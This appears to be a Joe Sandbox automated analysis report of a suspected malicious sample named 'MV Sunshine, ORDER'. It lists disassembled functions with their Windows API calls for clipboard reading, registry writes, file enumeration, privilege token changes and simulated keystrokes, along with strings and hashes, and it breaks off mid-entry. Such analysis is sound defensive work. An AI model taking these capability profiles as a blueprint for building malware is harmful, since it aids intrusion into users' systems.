TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A0D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A0D51A
SendMessageW.USER32 ref: 00A0D53D
ClientToScreen.USER32(?,?), ref: 00A0D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A0D5C3

Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC

GetWindowLongW.USER32(?,000000F0), ref: 00A0D65F

Strings

@GUI_DRAGID, xrefs: 00A0D1AA
F, xrefs: 00A0D543

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 4af8e6d1529af21130e36e8440cf2557ee7427e6f8f255ad3742386fa1a0eb36
Instruction ID: 6f7517cbf1872f8846ac9153d801843f5602b86e5d466282893d53cbfa3d64ac
Opcode Fuzzy Hash: 4af8e6d1529af21130e36e8440cf2557ee7427e6f8f255ad3742386fa1a0eb36
Instruction Fuzzy Hash: C242AE35204349AFD725CF68D844FAABBE5FF89324F14061DF695972E0C732A852CB92

Function 00A0804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00A0873F

Strings

%d/%02d/%02d, xrefs: 00A08478

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: fb92863faa6d5929f3ef8d8282b2584c7b19256761c5ed4b48fd135db2fcf727
Instruction ID: b43bfd9cddf79ab29983e88559a051e9926d3fbe248d64ccb1d2395c778c36a0
Opcode Fuzzy Hash: fb92863faa6d5929f3ef8d8282b2584c7b19256761c5ed4b48fd135db2fcf727
Instruction Fuzzy Hash: 4212E27050024CAFEB248F64EC49FAA7BB4EF89710F204129F555EB2E1DF799942CB54

Function 0099710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009975C2
_memset.LIBCMT ref: 009976B1
_memmove.LIBCMT ref: 00997C4B
_memmove.LIBCMT ref: 00997E4F

Strings

\b(?<=\w), xrefs: 009D3C41
[:>:]], xrefs: 0099760A
[:<:]], xrefs: 009975F1
Q\E, xrefs: 009981C1
DEFINE, xrefs: 009D25AF
\b(?=\w), xrefs: 009D3C34

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: da1343959f34ed76e90d00241b9737525d8b120de78a3c73638f0a8c244d0581
Instruction ID: 93d2a97755e68450be0ad92954b3fa3ac4117d757fbc96c151da0fd492ce89aa
Opcode Fuzzy Hash: da1343959f34ed76e90d00241b9737525d8b120de78a3c73638f0a8c244d0581
Instruction Fuzzy Hash: 7693AF71A4421A9BDF24CF98C881BADB7B5FF48310F24C56BE955AB380E7749E81CB50

Function 00984A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00984A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009BDA8E
IsIconic.USER32(?), ref: 009BDA97
ShowWindow.USER32(?,00000009), ref: 009BDAA4
SetForegroundWindow.USER32(?), ref: 009BDAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009BDAC4
GetCurrentThreadId.KERNEL32 ref: 009BDACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 009BDAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 009BDAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 009BDAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 009BDAF8
SetForegroundWindow.USER32(?), ref: 009BDAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 009BDB10
keybd_event.USER32(00000012,00000000), ref: 009BDB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 009BDB25
keybd_event.USER32(00000012,00000000), ref: 009BDB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 009BDB33
keybd_event.USER32(00000012,00000000), ref: 009BDB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 009BDB42
keybd_event.USER32(00000012,00000000), ref: 009BDB47
SetForegroundWindow.USER32(?), ref: 009BDB4A
AttachThreadInput.USER32(?,?,00000000), ref: 009BDB71

Strings

Shell_TrayWnd, xrefs: 009BDA89

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 464f4d8c11666cd89cb00d79c690f6808ff8273f2ceaf8392d87a5ff744a0208
Instruction ID: 5a96a6b45f75a1387a1ed148efc7448c8c993b20909f4c9196d17a0f480f6645
Opcode Fuzzy Hash: 464f4d8c11666cd89cb00d79c690f6808ff8273f2ceaf8392d87a5ff744a0208
Instruction Fuzzy Hash: 41315571A4131C7FEB31AFA19C49FBE7E6CEB44B60F114025FA04F61D0D6B15902ABA1

Function 009D8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 009D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D8D0D
Part of subcall function 009D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8D3A
Part of subcall function 009D8CC3: GetLastError.KERNEL32 ref: 009D8D47

_memset.LIBCMT ref: 009D889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009D88ED
CloseHandle.KERNEL32(?), ref: 009D88FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009D8915
GetProcessWindowStation.USER32 ref: 009D892E
SetProcessWindowStation.USER32(00000000), ref: 009D8938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009D8952

Part of subcall function 009D8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009D8851), ref: 009D8728
Part of subcall function 009D8713: CloseHandle.KERNEL32(?,?,009D8851), ref: 009D873A

Strings

default, xrefs: 009D894D
, xrefs: 009D88AA
winsta0, xrefs: 009D8910

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 7281d31086c0469852a21c20343ae5a30584a0b41aa237a2561c29d0e0158c51
Instruction ID: f476e517140f867f25552865ba6a618c4aadc1e57267c67f9a7e14582e997708
Opcode Fuzzy Hash: 7281d31086c0469852a21c20343ae5a30584a0b41aa237a2561c29d0e0158c51
Instruction Fuzzy Hash: FE812B71940249AFDF21DFA4DC45AEF7BBCEF04704F18816AF910B6262DB718E169B60

Function 009F425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00A0F910), ref: 009F4284
IsClipboardFormatAvailable.USER32(0000000D), ref: 009F4292
GetClipboardData.USER32(0000000D), ref: 009F429A
CloseClipboard.USER32 ref: 009F42A6
GlobalLock.KERNEL32(00000000), ref: 009F42C2
CloseClipboard.USER32 ref: 009F42CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 009F42E1
IsClipboardFormatAvailable.USER32(00000001), ref: 009F42EE
GetClipboardData.USER32(00000001), ref: 009F42F6
GlobalLock.KERNEL32(00000000), ref: 009F4303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 009F4337
CloseClipboard.USER32 ref: 009F4447

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: b415140c338319c47a847caf699e7cbca7e84a2520b55bad5c742d31bee7214a
Instruction ID: cd5cb1557512250e60ded8a27dfe97970adbe5053c8bce84c1bdec36841f0ed1
Opcode Fuzzy Hash: b415140c338319c47a847caf699e7cbca7e84a2520b55bad5c742d31bee7214a
Instruction Fuzzy Hash: 5D51A135204209AFD310FFA4DC95FBF77ACAF84B00F104529F656E22A1DB71D9068B62

Function 009EC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009EC9F8
FindClose.KERNEL32(00000000), ref: 009ECA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009ECA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009ECA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 009ECAAF
__swprintf.LIBCMT ref: 009ECAFB
__swprintf.LIBCMT ref: 009ECB3E

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

__swprintf.LIBCMT ref: 009ECB92

Part of subcall function 009A38D8: __woutput_l.LIBCMT ref: 009A3931

__swprintf.LIBCMT ref: 009ECBE0

Part of subcall function 009A38D8: __flsbuf.LIBCMT ref: 009A3953
Part of subcall function 009A38D8: __flsbuf.LIBCMT ref: 009A396B

__swprintf.LIBCMT ref: 009ECC2F
__swprintf.LIBCMT ref: 009ECC7E
__swprintf.LIBCMT ref: 009ECCCD

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 009ECAF5
%4d, xrefs: 009ECB38
%02d, xrefs: 009ECB86, 009ECB90, 009ECBDE, 009ECC2D, 009ECC7C, 009ECCCB

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 0c4f6176c35d86014d2569ccb3882281f1cb72bdc3fa226a4c378b08a58856a0
Instruction ID: 0fbc8fa5763a9b0930a95640890e2bbe456476464c9f7ef42174e98752ee5c07
Opcode Fuzzy Hash: 0c4f6176c35d86014d2569ccb3882281f1cb72bdc3fa226a4c378b08a58856a0
Instruction Fuzzy Hash: 27A13DB1508344ABC714FBA5C885EBFB7ECFF94700F444929B58697291EB34DA09CB62

Function 009EF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009EF221
_wcscmp.LIBCMT ref: 009EF236
_wcscmp.LIBCMT ref: 009EF24D
GetFileAttributesW.KERNEL32(?), ref: 009EF25F
SetFileAttributesW.KERNEL32(?,?), ref: 009EF279
FindNextFileW.KERNEL32(00000000,?), ref: 009EF291
FindClose.KERNEL32(00000000), ref: 009EF29C
FindFirstFileW.KERNEL32(*.*,?), ref: 009EF2B8
_wcscmp.LIBCMT ref: 009EF2DF
_wcscmp.LIBCMT ref: 009EF2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 009EF308
SetCurrentDirectoryW.KERNEL32(00A3A5A0), ref: 009EF326
FindNextFileW.KERNEL32(00000000,00000010), ref: 009EF330
FindClose.KERNEL32(00000000), ref: 009EF33D
FindClose.KERNEL32(00000000), ref: 009EF34F

Strings

*.*, xrefs: 009EF2B3

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: f7fd77189424e4c526bfb9e7747002831594e29302653937c34e061f2fd08a76
Instruction ID: dff23bfb0d651623ce7619868efd8adb42e1ae68a5bd0118b31e3b8a86c3a7b0
Opcode Fuzzy Hash: f7fd77189424e4c526bfb9e7747002831594e29302653937c34e061f2fd08a76
Instruction Fuzzy Hash: 1431D27650025D6EDF21DBB1DC68ADE73ACAF49360F104676F910E3190EB30DE46CA50

Function 00A00AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00A0F910,00000000,?,00000000,?,?), ref: 00A00C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A00C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A00D1D
RegCloseKey.ADVAPI32(?), ref: 00A0103D
RegCloseKey.ADVAPI32(00000000), ref: 00A0104A

Strings

REG_QWORD, xrefs: 00A00F8B
REG_SZ, xrefs: 00A00D5B
REG_MULTI_SZ, xrefs: 00A00E05
REG_DWORD, xrefs: 00A00F0E
REG_BINARY, xrefs: 00A00FD8
REG_EXPAND_SZ, xrefs: 00A00CBA

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: f19cc596a6a8810678e6785469182c879d10b8704d8ac83bc2516ca0bd052623
Instruction ID: f7f61dc95612f633c6c851477349b86baea796ce36743a343d7f5afdcffb249b
Opcode Fuzzy Hash: f19cc596a6a8810678e6785469182c879d10b8704d8ac83bc2516ca0bd052623
Instruction Fuzzy Hash: EC0225752046159FCB14EF28D891E2AB7E5BF89714F04885DF88A9B3A2DB31ED41CB81

Function 009EF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009EF37E
_wcscmp.LIBCMT ref: 009EF393
_wcscmp.LIBCMT ref: 009EF3AA

Part of subcall function 009E45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009E45DC

FindNextFileW.KERNEL32(00000000,?), ref: 009EF3D9
FindClose.KERNEL32(00000000), ref: 009EF3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 009EF400
_wcscmp.LIBCMT ref: 009EF427
_wcscmp.LIBCMT ref: 009EF43E
SetCurrentDirectoryW.KERNEL32(?), ref: 009EF450
SetCurrentDirectoryW.KERNEL32(00A3A5A0), ref: 009EF46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 009EF478
FindClose.KERNEL32(00000000), ref: 009EF485
FindClose.KERNEL32(00000000), ref: 009EF497

Strings

*.*, xrefs: 009EF3FB

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 616c0242b6b2cd4b7d6f8d3d5663253640c8d1c4473e61446dffc2d4a39c3d16
Instruction ID: 108f63f1b4a7abd3bca68ad053da37274335d87011aa74abc0cd21cb5f233dc7
Opcode Fuzzy Hash: 616c0242b6b2cd4b7d6f8d3d5663253640c8d1c4473e61446dffc2d4a39c3d16
Instruction Fuzzy Hash: AA31B77250125D7ECB21EBA5EC98ADE77ACAF49360F104676F850A30E1E730DE45CA54

Function 009D81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D8766
Part of subcall function 009D874A: GetLastError.KERNEL32(?,009D822A,?,?,?), ref: 009D8770
Part of subcall function 009D874A: GetProcessHeap.KERNEL32(00000008,?,?,009D822A,?,?,?), ref: 009D877F
Part of subcall function 009D874A: HeapAlloc.KERNEL32(00000000,?,009D822A,?,?,?), ref: 009D8786
Part of subcall function 009D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D879D

Part of subcall function 009D87E7: GetProcessHeap.KERNEL32(00000008,009D8240,00000000,00000000,?,009D8240,?), ref: 009D87F3
Part of subcall function 009D87E7: HeapAlloc.KERNEL32(00000000,?,009D8240,?), ref: 009D87FA
Part of subcall function 009D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009D8240,?), ref: 009D880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009D825B
_memset.LIBCMT ref: 009D8270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009D828F
GetLengthSid.ADVAPI32(?), ref: 009D82A0
GetAce.ADVAPI32(?,00000000,?), ref: 009D82DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009D82F9
GetLengthSid.ADVAPI32(?), ref: 009D8316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009D8325
HeapAlloc.KERNEL32(00000000), ref: 009D832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 009D834D
CopySid.ADVAPI32(00000000), ref: 009D8354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009D8385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009D83AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009D83BF

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 86ef76815959252559b49089bc5d6cfe5c0c22fd03ce56e665aa98e0d85802af
Instruction ID: 832a976239967299e0de6d9ea93d9759526cc320506ea626c7642c3f7577c87c
Opcode Fuzzy Hash: 86ef76815959252559b49089bc5d6cfe5c0c22fd03ce56e665aa98e0d85802af
Instruction Fuzzy Hash: AB614E71940209EFDF10DF94DC89AEEBBB9FF04710F14816AF915A7292DB319A16CB60

Function 00996843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

LF), xrefs: 009D16DD
ANYCRLF), xrefs: 009D1734
BSR_UNICODE), xrefs: 009D1771
LIMIT_RECURSION=, xrefs: 009D1635
UCP), xrefs: 009D1546
NO_START_OPT), xrefs: 009D1588
NO_AUTO_POSSESS), xrefs: 009D1567
UTF16), xrefs: 009D1508
BSR_ANYCRLF), xrefs: 009D1757
LIMIT_MATCH=, xrefs: 009D15A9
CR), xrefs: 009D16C0
CRLF), xrefs: 009D16FA
ANY), xrefs: 009D1717
UTF), xrefs: 009D1533

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 72b3ac179eda186f40dced9fe8e3935514fea05521e517df33f02529f33ac486
Instruction ID: 42d72fbbf3271b56d1a8646a3db3aa185e9783899228148a58b6dcfcc3cee7ee
Opcode Fuzzy Hash: 72b3ac179eda186f40dced9fe8e3935514fea05521e517df33f02529f33ac486
Instruction Fuzzy Hash: 19727F72E002199BDF24CF58D8907AEB7B5FF48310F14856AE959EB390EB749D81CB90

Function 00A00665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A00038,?,?), ref: 00A010BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00737

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A007D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A0086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A00AAD
RegCloseKey.ADVAPI32(00000000), ref: 00A00ABA

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 373fc798cdf5576e2a04d77cf76b861ce73264c014cf1dc5d3bbcffe758a384e
Instruction ID: 2a3e4a10319f7bfbeb4076bd1267b1ee55c07796bcef767c38797e4de3197d44
